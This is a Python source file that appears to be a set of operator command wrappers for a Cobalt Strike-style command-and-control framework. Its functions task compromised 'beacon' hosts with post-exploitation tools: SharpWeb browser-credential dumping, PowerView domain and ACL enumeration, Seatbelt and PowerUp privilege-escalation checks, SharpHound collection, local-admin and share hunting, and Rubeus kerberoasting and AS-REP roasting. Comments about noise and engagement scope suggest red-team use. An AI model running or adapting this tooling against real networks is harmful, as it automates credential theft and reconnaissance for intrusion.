def _(bid, out=None):
    """Run SharpWeb's 'all' collection on the beacon.

    If *out* is truthy it is passed through as the tool's '-o' output file;
    otherwise results go wherever the tool writes by default.
    """
    output_flag = ['-o', out] if out else []
    external.run(bid, 'sharpweb', ['all'] + output_flag)
def _(bid): temp = helpers.guess_temp(bid) # Forests and trusts: # Get-DomainTrustMapping # Get-ForestTrust # Get-DomainTrust # Parsing GPOs: # Get-GptTmpl # Get-GroupsXML # File shares: # Get-DomainFileServer # Get-DomainDFSShare # Get-DomainManagedSecurityGroup? # TODO remove subnet and site? # computer objects don't show up in Get-DomainObject for some reason command = helpers.code_string(r""" cd {} $FormatEnumerationLimit=-1 Get-DomainObject | Format-List -Property * > objects.domain Get-DomainPolicyData | Format-List -Property * > policy.domain Get-DomainSite | Format-List -Property * > sites.domain Get-DomainSubnet | Format-List -Property * > subnets.domain Get-DomainGPOUserLocalGroupMapping | Format-List -Property * > gpo_localgroups.domain Get-GPODelegation | Format-List -Property * > gpo_delegations.domain Get-DomainGPO | %{{Get-ObjectACL -ResolveGUIDs -Name $_.Name}} > gpo_acls.domain Get-DomainTrustMapping | Format-List -Property * > trusts.domain Get-DomainManagedSecurityGroup | Format-List -Property * > managers.domain Invoke-ACLScanner -ResolveGUIDs > interesting_acls.domain echo "All finished with domain-enum. Run domain-enum-next." """.format(powershell_quote(temp))) aggressor.btask( bid, 'Tasked beacon to enumerate domain objects and info (stage 1/3)') external.run(bid, 'powerview', command)
def _(bid, *args):
    """Run Seatbelt's 'user' check group on the beacon, followed by any extra
    arguments the operator supplied."""
    seatbelt_args = ['user']
    seatbelt_args.extend(args)
    external.run(bid, 'seatbelt', seatbelt_args)
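def _(bid, *args):
    """Run Seatbelt on the beacon with exactly the arguments given.

    The arguments are converted to a list before being handed to
    external.run so this wrapper matches the sibling Seatbelt wrappers in
    this file, which all pass lists rather than the raw *args tuple.
    """
    external.run(bid, 'seatbelt', list(args))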
def _(bid, *args):
    """Run Seatbelt's 'system' check group on the beacon, followed by any
    extra arguments the operator supplied."""
    seatbelt_args = ['system']
    seatbelt_args.extend(args)
    external.run(bid, 'seatbelt', seatbelt_args)
def _(bid, *args):
    """Run PowerView's Invoke-FileFinder on the beacon.

    Extra *args are space-joined and appended to the cmdlet, so operators
    can pass PowerView flags straight through.
    """
    extra = ' '.join(args)
    external.run(bid, 'powerview', 'Invoke-FileFinder ' + extra)
def callback(bid, *args, function=function):
    """Run a single PowerView cmdlet (*function*) on the beacon with any
    extra arguments space-joined after it.

    *function* is captured as a default argument so its value is fixed at
    definition time; the enclosing scope that supplies it is not visible in
    this excerpt.
    """
    extra = ' '.join(args)
    command = '{} {}'.format(function, extra)
    external.run(bid, 'powerview', command)
def _(bid):
    """Run Seatbelt's 'Patches' check on the beacon (single check, passed as
    a bare string like the 'MappedDrives' wrapper below)."""
    check = 'Patches'
    external.run(bid, 'seatbelt', check)
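def _(bid, *args):
    """Run PowerUp's Invoke-AllChecks on the beacon, piped through
    Format-List with $FormatEnumerationLimit=-1 so collection properties are
    not truncated.

    Extra *args are appended to the PowerShell command line. The original
    concatenated them directly onto 'Format-List' with no separator, so any
    extra argument (e.g. '-Property *') was glued to the cmdlet name and
    broke the pipeline; they are now space-joined like the other wrappers.
    """
    base = '$FormatEnumerationLimit=-1; Invoke-AllChecks | Format-List'
    command = ' '.join([base] + list(args))
    external.run(bid, 'powerup', command)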
def _(bid, *args):
    """Run every Seatbelt check in 'full' output mode on the beacon, followed
    by any extra arguments the operator supplied."""
    seatbelt_args = ['all', 'full']
    seatbelt_args.extend(args)
    external.run(bid, 'seatbelt', seatbelt_args)
def _(bid):
    """Run a small host-triage set of Seatbelt checks on the beacon: OS
    basics, user profile folders, AV products via WMI and notable
    processes."""
    triage_checks = [
        'BasicOSInfo',
        'UserFolders',
        'AntiVirusWMI',
        'InterestingProcesses',
    ]
    external.run(bid, 'seatbelt', triage_checks)
def _(bid, *args):
    """Run Grouper on the beacon with the given arguments passed through as
    a list."""
    grouper_args = [arg for arg in args]
    external.run(bid, 'grouper', grouper_args)
def _(bid):
    """Run Seatbelt's TCP and UDP connection listing checks on the beacon."""
    connection_checks = ['AllTcpConnections', 'AllUdpConnections']
    external.run(bid, 'seatbelt', connection_checks)
def _(bid, *args):
    """Run SharpHound with '--CollectionMethod All' on the beacon, followed
    by any extra arguments the operator supplied.

    NOTE(review): 'All' is the broadest collection mode and, as far as can
    be told from the flag alone, contacts hosts across the domain for
    session and local-group data — confirm that noise level is acceptable
    for the engagement before using it; the '--Stealth' wrapper below is
    the alternative.
    """
    sharphound_args = ['--CollectionMethod', 'All']
    sharphound_args.extend(args)
    external.run(bid, 'sharphound', sharphound_args)
def _(bid, *args):
    """Run SharpHound with '--Stealth' on the beacon, followed by any extra
    arguments the operator supplied (the lower-noise counterpart of the
    '--CollectionMethod All' wrapper above)."""
    sharphound_args = ['--Stealth']
    sharphound_args.extend(args)
    external.run(bid, 'sharphound', sharphound_args)
def _(bid, *args):
    """Run SharpHound on the beacon with exactly the arguments given."""
    sharphound_args = [arg for arg in args]
    external.run(bid, 'sharphound', sharphound_args)
def _(bid, *args):
    """Run PowerView's Find-LocalAdminAccess on the beacon and echo a marker
    line when it completes, so the operator can tell the long job is done.

    Extra *args are space-joined after the cmdlet.

    NOTE(review): this cmdlet tests admin access against hosts in the
    domain, which presumably produces an authentication event on each
    target — confirm scope before running it.
    """
    extra = ' '.join(args)
    command = ('Find-LocalAdminAccess %s; '
               'echo "Finished with Find-LocalAdminAccess"' % extra)
    external.run(bid, 'powerview', command)
def _(bid, *args):
    """Run PowerView's Invoke-ShareFinder with -CheckShareAccess on the
    beacon, appending any extra operator-supplied arguments.

    NOTE(review): -CheckShareAccess means each discovered share is actually
    opened, not just listed — expect share-access events on every host.
    """
    extra = ' '.join(args)
    command = 'Invoke-ShareFinder -CheckShareAccess %s' % extra
    external.run(bid, 'powerview', command)
def _(bid):
    """Run Seatbelt's 'MappedDrives' check on the beacon (single check,
    passed as a bare string like the 'Patches' wrapper above)."""
    check = 'MappedDrives'
    external.run(bid, 'seatbelt', check)
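def _(bid, *args):
    """Run Rubeus on the beacon with exactly the arguments given.

    The arguments are converted to a list before being handed to
    external.run so this matches the other Rubeus wrappers in this file,
    which pass lists (e.g. ['kerberoast']) rather than the raw *args tuple.
    """
    external.run(bid, 'rubeus', list(args))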
def _(bid):
    """Run a privilege-escalation-oriented set of Seatbelt checks on the
    beacon: OS basics, UAC policy, installed patches, token privileges and
    local group membership."""
    privesc_checks = [
        'BasicOSInfo',
        'UACSystemPolicies',
        'Patches',
        'TokenGroupPrivs',
        'LocalGroupMembers',
    ]
    external.run(bid, 'seatbelt', privesc_checks)
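def _(bid, *args):
    """Run Rubeus 'kerberoast' on the beacon, followed by any extra
    arguments the operator supplied.

    *args arrives as a tuple, and the original did ['kerberoast'] + args,
    which raises TypeError (list + tuple) as soon as any extra argument is
    given; convert to a list first, as the Seatbelt wrappers do.

    NOTE(review): kerberoasting requests service tickets for SPN accounts;
    presumably each request is visible to the DC — scope accordingly.
    """
    external.run(bid, 'rubeus', ['kerberoast'] + list(args))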
def _(bid, *args):
    """Run an arbitrary PowerUp command on the beacon.

    Extra *args are space-joined into the command; $FormatEnumerationLimit
    is set to -1 first so collection properties are not truncated.
    """
    extra = ' '.join(args)
    command = '$FormatEnumerationLimit=-1; {}'.format(extra)
    external.run(bid, 'powerup', command)
def _(bid):
    """Run Rubeus 'kerberoast' and then 'asreproast' on the beacon, as two
    separate tasks in that order."""
    for roast in ('kerberoast', 'asreproast'):
        external.run(bid, 'rubeus', [roast])
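def _(bid, *args):
    """Run SharpUp on the beacon with exactly the arguments given.

    The arguments are converted to a list before being handed to
    external.run so this wrapper matches the other tool wrappers in this
    file, which pass lists rather than the raw *args tuple.
    """
    external.run(bid, 'sharpup', list(args))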
def _(bid, *args):
    """Run PowerView on the beacon with the raw argument tuple.

    NOTE(review): the other PowerView wrappers in this file hand
    external.run a single command string; this one passes the *args tuple
    unchanged — presumably external.run joins it, but confirm before relying
    on multi-word arguments here.
    """
    powerview_args = args
    external.run(bid, 'powerview', powerview_args)